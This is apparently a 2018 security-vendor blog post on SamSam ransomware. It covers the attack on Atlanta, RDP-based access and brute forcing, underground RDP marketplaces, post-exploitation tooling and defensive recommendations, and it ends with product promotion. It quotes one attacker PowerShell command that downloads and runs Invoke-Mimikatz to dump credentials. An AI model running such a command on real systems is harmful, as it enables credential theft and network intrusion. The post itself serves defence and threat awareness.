Threats 101
Jonathan Crowe
May 2018

What Makes SamSam, the Ransomware that Crippled Atlanta, So Different

samsam-ransomware-2018

Despite being one of today's most active and damaging threats, many of the facts surrounding SamSam ransomware remain in the dark. Here's everything you need to know to protect your organization.

When news broke on March 22 that the City of Atlanta was grappling with a ransomware infection, it understandably made national headlines. Here was a major U.S. city being extorted by cybercriminals, its IT infrastructure devastated. Operations in five of the city's 13 departments were seriously disrupted, which triggered far-reaching, public-facing consequences. Residents couldn't pay water bills. Courts were unable to validate warrants. The police department and other city employees had to revert back to filing paperwork by hand. Public wi-fi at the nation's busiest airport was down for two weeks. Years' worth of files and correspondence were reportedly lost

But also lost in the midst of the fallout-focused coverage was the fact that this wasn't a typical ransomware infection. The variant used (SamSam) and the criminal group behind it ("Gold Lowell") stand apart in significant ways, from how targets are selected to how SamSam is delivered and deployed. 

As a result, many of the usual, generic tips for safeguarding against garden-variety ransomware (ex: train users not to open suspicious email attachments) don't apply to SamSam. And basic advice on how to mitigate active infections tends to underplay it in dangerous ways, too. 

The goal of this post is to shed additional light on SamSam so that organizations can gain a more accurate understanding of what they're actually up against and prepare themselves accordingly. To start, we first need to dismiss one of the biggest misconceptions when it comes to SamSam. 

SamSam isn't spread through phishing emails

SamSam-ransomware-attack-chain-2018-1

Click to expand

Unlike many ransomware strains, SamSam isn't distributed in spam email campaigns. There's no tricking employees into clicking on links or email attachments they shouldn't. Instead, the attackers behind SamSam avoid user interaction altogether and take a more direct route to infection — they identify vulnerable servers that they can gain access to via weak or stolen credentials. 

They aren't alone in using this approach. Identifying systems with open ports that are exposing Remote Desktop Protocol (RDP), virtual network computing (VNC), or other vulnerable services is an extremely popular attack tactic, and it's made disturbingly easy thanks to scanning tools like Shodan, Nmap, and masscan. In fact, while it's easy to think of click-happy users as being the ultimate low-hanging fruit, one could argue exposed RDP connections represent an even easier way in for attackers — and an even bigger risk. 

The criminals behind CrySiS, LockCrypt, Shade, Apocalypse, and other ransomware variants have all honed in on RDP as their attack vector of choice, but few have done it as notoriously or as successfully as the threat group responsible for SamSam. Dubbed "Gold Lowell" by Dell's Secureworks, the attackers extorted at least $325,000 over the course of just four weeks in late December 2017 - early January 2018, alone.

Experts have attributed that success at least in part to the group's selection of targets, which tends to single out industries with reputations for outdated systems and software and/or smaller security budgets — think healthcare, education and local government. Another key ingredient is low tolerance for downtime, which, in an ideal situation for the attackers, translates into an eagerness to consider all options — including paying the ransom — in order to make the problem go away as quickly as possible.  

How SamSam attackers pick targets and gain access

As researchers at Secureworks explain, in the early days of SamSam (late 2015 — mid 2016), many of the group's targets were hospitals that had vulnerable Internet-facing JBoss systems. The group made use of an open-source JBoss exploitation tool called JexBoss, and in some cases took advantage of a CVE that dated back to 2010. Whether the actors pointedly targeted hospitals from the outset, however, is unclear. It may simply be that those were the majority of systems showing up in early vulnerability scans, and the group decided to continue focusing on hospitals following the initial success they had infecting and extorting ransom from them. 

Whatever the case, by 2017 the group had shifted tactics from exploiting JBoss vulnerabilities to brute-forcing or using stolen credentials to establish RDP connections. But healthcare remained — and continues to be — a popular target.

In April 2017, the attackers used a RDP brute force attack to infect Erie County Medical Center, a major hospital in Buffalo, New York, with SamSam. More than three months later, the hospital estimated the total cost of recovery from the attack had reached $10 million

Thus far in 2018, confirmed victims of SamSam infections include two Indiana-based hospitals — Hancock Health and Adams Memorial Hospital — and electronic health records (EHR) provider Allscripts

samsam-ransowmare-2018-attack-timeline-updated-2

The other vertical that has seen the majority of (publicly reported) SamSam attacks this year is local governments and municipalities. In addition to Atlanta, that includes attacks on Farmington, NM and Davidson County, NC. The Colorado Department of Transportation was also infected with SamSam, not once but twice in the span of eight days.  

So is it safe to say healthcare and government organizations are the only ones being currently targeted? Not necessarily. 

One thing these two verticals have in common is that downtime tends to be public-facing, and therefore malware infections are generally difficult things to keep under wraps (in fact, for healthcare providers, public disclosure of ransomware and other malware infections is mandatory). So it could very well be that organizations in other verticals are getting infected with SamSam, too, but these attacks on healthcare and government organizations are the only ones making headlines (though an attack on Mississippi Valley State University in March made news, as well). 

Researchers at Secureworks suggest that's more likely the case, arguing that the group's attacks appear to be more opportunistic in nature, rather than limited solely to specific targets in specific industries chosen in advance. 

If that's the case, how do "opportunities" pop-up on the attackers' radar, and how do organizations avoid becoming one?

Scanning for exposed RDP, VNC, and other vulnerable services 

As mentioned above, one option the attackers have is to use tools like Shodan, Nmap, and masscan to scan the Internet for systems that are exposed and vulnerable.

A quick scan using Shodan, for example, shows that there are currently over 3.2 million endpoints with RDP exposed.

Shodan-RDP-exposedThe "top organizations" listed here are cloud, virtual, or physical hosting providers, which makes sense — the majority of exposed endpoints are likely hosted machines that require remote access.

For what it's worth, these results are actually a marked improvement on the numbers Rapid7 researcher Jon Hart got when he ran his own scan last August. Using the Rapid7's Project Sonar, Hart determined there were over 4 million endpoints exposing RDP. Here's how he reacted:

"This number is shockingly high when you remember that this protocol is effectively a way to expose keyboard, mouse and ultimately a Windows desktop over the network. Furthermore, any RDP speaking endpoints discovered by this Sonar study are not applying basic firewall rules or ACLs to protect this service, which brings into question whether or not any of the other basic security practices have been applied to these endpoints." 

Even with that number down to 3.2 million that's more than enough potential targets to keep attackers busy for a long, long time. Add in 535,000 endpoints with VNC exposed — 7,445 of which have authentication disabled — and it's clear there's no lack of opportunities for attackers to go poking around on remote systems, even if they have little-to-no technical expertise.

Conducting brute force attacks 

Once attackers set their sights on a system with Internet-facing RDP, the next step is to try gaining access using a wide range of commonly-used account names and passwords to see if any fit the bill. There are several tools available that automate these brute-force attempts, and researchers at Secureworks have found evidence that at least one of them — NLBrute — has been used in SamSam attacks.

NLBrute-tool

Screenshots of NLBrute, a RDP brute-force tool used in some SamSam attacks. Source: Secureworks


As researcher Kevin Beaumont warns, brute-force attacks on exposed RDP servers aren't just prevalent, they're essentially a given. 

“Anybody who has setup a honeypot recently will know within seconds you will be getting hit with failed RDP logins. First they portscan, then thousands of login attempts arrive.”

Kevin Beaumont, "RDP Hijacking" 

Of course, brute-force attacks aren't the only way of accessing RDP or VNC accounts. Another option is to simply purchase access to accounts that have already been compromised.

Buying RDP access from underground marketplaces

Where can a criminal go to buy or sell access to compromised servers? xDedic is one of the most infamous options. Details of the dark web marketplace first came to light in a report from Kaspersky Labs published in June 2016, which revealed it to be a thriving platform with access to over 70,000 hacked RDP servers up for sale, some for as little as $2. 

Shortly after the report was issued, xDedic went offline, only to resurface on a Tor domain with more restricted access and, by some reports, even more hacked servers. Currently, new visitors to the site are informed that "registration is closed." To gain access, they have to either receive an invitation from a current member, contact the xDedic support team, or purchase an invite for $200. 

Membership provides access to a large, searchable database of servers, which can be filtered by geography, OS, date last checked, seller, etc. 

xDedic-hacked-RDP-server-marketplace

Screenshot of the xDedic marketplace. Source: Security researcher Bryan Campbell


The way xDedic works is by providing a platform for these compromised servers to be bought and sold by independent parties. That allows the developers of the marketplace to arguably stay one step removed since they aren't selling anything directly, themselves — although they do also provide additional tools attackers can use to make leveraging the hacked RDP servers more successful. One such tool, xDedicRDPPatch, enables the creation of new RDP user accounts to help attackers maintain access even if the original account's credentials are changed or the account gets deleted.

xDedicRDPPAtch also serves as a direct link between xDedic and the group behind SamSam. Secureworks confirms the tool has been used in SamSam attacks, which raises the possibility and likelihood that the attackers have taken advantage of the site's other offerings (such as access to compromised RDP servers), as well.

Pricing for servers fluctuates based on a variety of factors, primarily geography and OS. Ex: Servers in European and North American countries tend to go for more money than servers in other parts of the world. Would-be buyers can also preview details such as whether the hacked account has admin privileges, what AV is installed, what browsers, etc. They can also check to make sure the account isn't blacklisted before they buy. You can see a video that shows what navigating xDedic looks like here.

Compromised-RDP-server-xDedic

A hacked RDP server for sale on xDedic. Source: Security researcher Bryan Campbell


When security researchers at Flashpoint analyzed the xDedic marketplace in August 2017, they found access for over 85,000 servers up for sale. Organizing the servers by vertical, they discovered the majority (nearly two-thirds) belonged to K-12 schools and universities.

It's likely no coincidence that attacks on schools have been on the rise, or that the other sectors with high shares of hacked servers — healthcare, legal, and government, especially — have been constant targets of ransomware attacks.  

xdedic-compromised-rdp-servers-by-industry

The sectors with most hacked RDP servers for sale on xDedic. Source: Flashpoint


xDedic isn't the only marketplace for compromised RDP servers, however. Ultimate Anonymity Services (UAC) is another popular (if more limited) option. According to additional analysis conducted by Flashpoint, UAC posted over 35,000 RDP servers for sale in October 2017, with the majority concentrated in China, Brazil, and India (in comparison, the top countries for xDedic were the United States, Germany, and Ukraine).

Pricing on UAC is roughly similar to xDedic, with costs fluctuating based primarily on geography and OS. 

uas-marketplace-rdp-servers-pricing-model

The pricing model for compromised RDP servers for sale on UAS. Source: Flashpoint


With access to so many compromised RDP servers so cheaply available, it's no surprise the criminals behind SamSam and other ransomware variants are flocking to RDP as an attack vector. 

Abusing legitimate tools to deploy SamSam throughout the network

Unlike the majority of commodity ransomware, SamSam deployment is neither automatic nor fully automated. The attackers take the time to actively investigate their targets first, and they manually abuse a variety of otherwise legitimate admin tools in order to set the stage for a successful infection. When they do launch the ransomware it's only after they've had the chance to strategically deploy it throughout the compromised network to better ensure it has maximum effect.

In fact, in some investigated cases, the period of time between initial compromise and SamSam deployment has been a month or even longer

To accomplish their goals, the attackers behind SamSam commonly engage in a variety of post-exploitation activities. Here are some of the most common. 

Elevating privileges with Mimikatz

In many cases, if the attackers have been able to gain access via RDP chances are the account they've cracked or hijacked already provides them with admin privileges (xDedic allows customers to filter by server accounts with admin privileges, specifically). 

If that's not the case, however, elevating privileges becomes the first order of business. That's because having admin privileges is a prerequisite for many of the activities listed below.

One way researchers have observed SamSam attackers trying to get their hands on admin credentials is by utilizing the credential harvesting tool Mimikatz. Specifically, they've been spotted using PowerShell to download and launch the Invoke-Mimikatz module from the penetration testing framework PowerSploit:

powershell.exe iex (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent[.]com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1');Invoke-Mimikatz –DumpCreds 
Once they have the right privileges, the attackers will often create new user accounts to provide them with additional access back into the network should the originally compromised account be disabled or the password changed. 

 

Reconnaissance with Hyena or csvde.exe 

Next on the attackers' to-do list is getting a better lay of the land. One approach they've used is downloading and using Hyena, a legitimate administration tool that allows them to scan the network and enumerate a wide variety of details about connected systems, including running services, configuration settings, and users. 

hyena-systemtools

Hyena is a legitimate network administration tool SamSam attackers have been known to abuse. Source: SystemTools


Another approach Secureworks researchers have observed is the abuse of csvde.exe, a legitimate command-line tool that can import and export data from Active Directory Domain Services (AD DS) and save it to a .csv file. SamSam attackers have used csvde.exe to collect hostnames from AD DS, and subsequently deployed a batch file designed to ping each system, creating a list of machines they have access to.

Using PsExec, Wmiexec, and SMB to deploy and execute SamSam

At this point, the attackers can turn their attention to deploying SamSam far and wide throughout the network. To do so, they've been spotted using batch scripts in combination with legitimate remote process execution tools like PsExec, WMI (via Wmiexec.py), and, once again, RDP. 

In separate incidents, researchers have also reported seeing the attackers use reGeorg, a tool used for TCP tunneling through a SOCKS proxy, and Server Message Block (SMB) protocol to establish connections between systems prior to SamSam deployment. 

As a final point of preparation, the attackers have even been known to disable system security settings along with endpoint protection software to ensure SamSam will run without being quarantined or blocked. 

Encrypting files, deleting itself, and tampering with recovery

Once executed, SamSam will search out approximately 300 different file types and begin encrypting them based on file size (smallest files first). Once encryption is complete, its new mission is to remove all traces of itself (to prevent researchers from analyzing it) and to make recovering from the attack as miserable and difficult as possible. 

One trick it uses to tamper with recovery is launching SDelete (another legitimate Sysinternals tool) to wipe all free space on the disk, effectively zeroing out all traces of recently deleted files that could otherwise potentially be recovered. It then deletes the wiper (along with the main ransomware binary), and launches a second binary to hunt down and delete any backup files it can find, including backups on network-accessible drives. 

Pricing the ransom demand just right

samsam-ransom-note-2018

SamSam ransom note. Source: Secureworks

With the encryption and other damage complete, all that's left is for the attackers to drop the ransom note explaining the only way to recover the files is to pay for the private decryption keys. 

 

The attackers provide victims with two payment options: 

  1. A specified Bitcoin amount for each affected machine they want decrypted
  2. One larger "discount" bulk price for decrypting all affected machines

In an attempt to establish they can be trusted, the attackers also invite victims to upload two encrypted files that they will decrypt for free as a "demo." 

The demand amounts have fluctuated since SamSam attacks started appearing in 2016 (as has the price of Bitcoin, obviously), but notable 2018 attacks on Farmington, NM (bulk demand: $45,470), Hancock Health (bulk demand: $55,000), and Atlanta (bulk demand: $51,000) provide a current ballpark figure for how costly these attacks can be for victims.

Those demands also appear to fall into a lucrative sweet spot for the attackers — it's enough money to make the attacks well worthwhile, yet it's also low enough in comparison to downtime and recovery costs that organizations will consider paying it. 

As Hancock Health SVP and Chief Strategy Officer Rob Matt explained when asked to elaborate on the hospital's decision to pay the ransom, "The amount of ransom was reasonable in respect to the cost of continuing downtime and not being able to care for patients."

"These folks have an interesting business model," Hancock Health CEO Steve Long added. "They make it just easy enough [to pay the ransom]. They price it right."

Why SamSam gives infected victims so much trouble

"The tools we have in place didn't work. It's ahead of our tools."

— Brandi Simmons, spokesperson for the Colorado Office of Information Technology regarding the CDOT's second SamSam infection in eight days

Many factors can play into an organization's ability (or inability) to recover from any ransomware infection, but SamSam attacks are notorious for being especially problematic. Seven weeks after the attack on Atlanta, the city is still recovering (online water bill payment systems were just restored on May 8). A SamSam attack on Erie County Medical Center in New York required over three months of recovery efforts, costing nearly $10 million.

One of the reasons these attacks are so damaging is that they are fundamentally different and more invasive by nature. With other ransomware, what you're dealing with is a piece of bad software programmed to follow limited, pre-defined instructions. With SamSam, on the other hand, what you're dealing with is bad people actively crawling all over your network. They probe for opportunities and weaknesses. They adapt to obstacles and restrictions. They react and create workarounds. They've even been known to fight back against removal attempts and subvert recovery operations. 

During the SamSam attack on the Colorado Department of Transportation (CDOT), for example, attackers saw that the organization was attempting to move forward with third-party recovery efforts instead of paying the ransom. They reacted by leveraging an additional user account or other access point they had created to successfully infect the CDOT a second time, this time using a slightly modified version of SamSam that once again slipped past their antivirus solution (McAfee)

"We had 20 percent of the computers up and running when our security tools detected malicious activity," a spokesperson from the Colorado Office of Information Technology explained. "And sure enough the variant of SamSam ransomware just keeps changing. The tools we have in place didn't work. It's ahead of our tools." 

The live attacker component makes SamSam infections a different problem altogether — one that can't be solved by simply wiping a machine and restoring from backup. Until any and all access points the attackers are leveraging have been sniffed out and removed, there's nothing stopping infections from occurring over and over again, or nothing to prevent the attackers from deploying stealthier forms of malware (credential stealers, banking trojans, cryptominers, etc.). 

How to protect your organization against SamSam 

Step 1: Secure RDP

The best way to think about SamSam infections is to understand that they are symptoms of a bigger problem — attackers have managed to get active (and potentially highly privileged) access to your systems. Preventing that ugly situation in the first place should obviously be your primary goal, and as far as keeping SamSam attackers off your systems is concerned, securing RDP is a crucial first step. 

To prevent attackers from gaining access to servers via RDP, make sure you're doing the following:

  • When at all possible, avoid exposing RDP to the Internet (when in doubt you can use scanning tools like Nmap, masscan, and Shodan to see if you have any exposed ports — rest assured bad guys are already doing this, so take a few minutes to see what they see).  
  • Restrict RDP access behind firewalls and by using a RD Gateway, VPNs
  • Use strong passwords and two-factor authentication
  • Limit users who can log in using remote desktop
  • Implement an account lockout policy to help thwart brute force attacks

For more information on securing RDP, see this guide from UC Berkeley

Step 2: Limit access to other remote administration tools

Because SamSam attackers rely on abusing legitimate tools to deploy the ransomware throughout victim networks, preemptively limiting access to those tools and/or restricting their functionality can throw a wrench in those plans. 

Restricting the use of PsExec

Part of Microsoft's Sysinternals suite, PsExec provides remote command execution by connecting to the hidden ADMIN$ share on a remote system via Server Message Block (SMB) protocol, and starting the PsExecsvc service. PsExec does not come pre-loaded into Windows by default, so if it isn’t already present on a system it has to be installed. That provides an opportunity for blacklisting PsExec.exe and PsExecsvc.exe, though attackers have been known to use renamed versions of the program or versions that are PowerShell-based. The latter provide the same functionality, but instead of writing an executable to disk (which AVs can scan), they execute directly in memory.  

A potentially more effective approach than blacklisting is taking advantage of user account control (UAC) token filtering. Ex: By enabling Admin Approval Mode (disabled by default) for the built-in administrator account, you can limit PsExec so all attempts to abuse it will fail unless initiated by a domain account. You can turn on Admin Approval Mode by enabling the following registry key:

HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\FilterAdministratorToken


Monitoring and responding to suspicious WMI activities

Next on the list is Windows Management Instrumentation (WMI). WMI provides administrators with a wide range of powerful capabilities, including locally or remotely executing scripts via its command line tool (wmic.exe) or PowerShell.

One way to combat malicious abuse is to fight WMI with WMI. As researcher Matt Graeber explains, WMI event subscriptions can be created that log and respond to suspicious WMI activities (examples here and here). In addition, if you don’t need to use remote WMI, set a fixed port for it and block it.

Step 3: Don't just rely on AV — use stronger, smarter endpoint security

This year's influx of successful SamSam infections makes it abundantly clear that relying on antivirus to block these attacks is a major liability. Barkly provides defense-in-depth against SamSam and other ransomware thanks to its patented combination of machine learning and real-time behavioral analysis. 

Not only does Barkly recognize and block SamSam payloads, it also blocks the types of malicious techniques SamSam attackers rely on to pull off their attacks. By preventing their attempt at harvesting credentials, for example, Barkly can thwart attackers before they have the chance to gain more access and dangerous capabilities.

Barkly-blocks-SamSam-attack-chain-2018

Click to expand

As a result, Barkly protection extends across multiple points in the SamSam attack chain, providing organizations with defense-in-depth and blocking the ransomware before any files are encrypted.  

Samsam

Barkly blocks SamSam, but also prevents malicious activity earlier in the attack chain. 


Step 4: Practice 3-2-1 backup

With SamSam attackers explicitly seeking out backups in order to encrypt or delete them, it's critical to make sure you have three copies of your data in two different locations, one of which is offsite/not network accessible. 

With more attacks to come, here's how to stay up-to-date

The criminals behind SamSam have been relatively quiet since the Atlanta attack in March, but there is no reason to believe the silence will last for long. As long as there are exposed RDP connections and other vulnerabilities calling out to them, they'll continue launching attacks. 

We'll continue following SamSam closely. For updates on it and other threats, sign up for the Barkly blog. You'll get 1-2 articles a week, including in-depth analysis like the post you just read, plus shorter alerts explaining what you need to know about the newest malware campaigns as they're discovered.

If you're looking for more actionable security tips, check out our new eBook, The Smart IT Pro's Essential Guide to Blocking Malware. It's free and has 35 pages full of checklists, quick wins, and practical advice for securing your company. 

Jonathan Crowe

Jonathan Crowe

Jonathan covers the latest threats and cybersecurity trends from a practical point of view.

lock-white.png

Close the gaps in your security

Stop paying for AV, get the strongest protection instead. See how Barkly blocks attacks that are getting past AV.

See a demo

Comments

Stay informed!

Get the latest security news, tips, and trends straight to your inbox.

Stay informed!

Get the latest security news, tips, and trends straight to your inbox.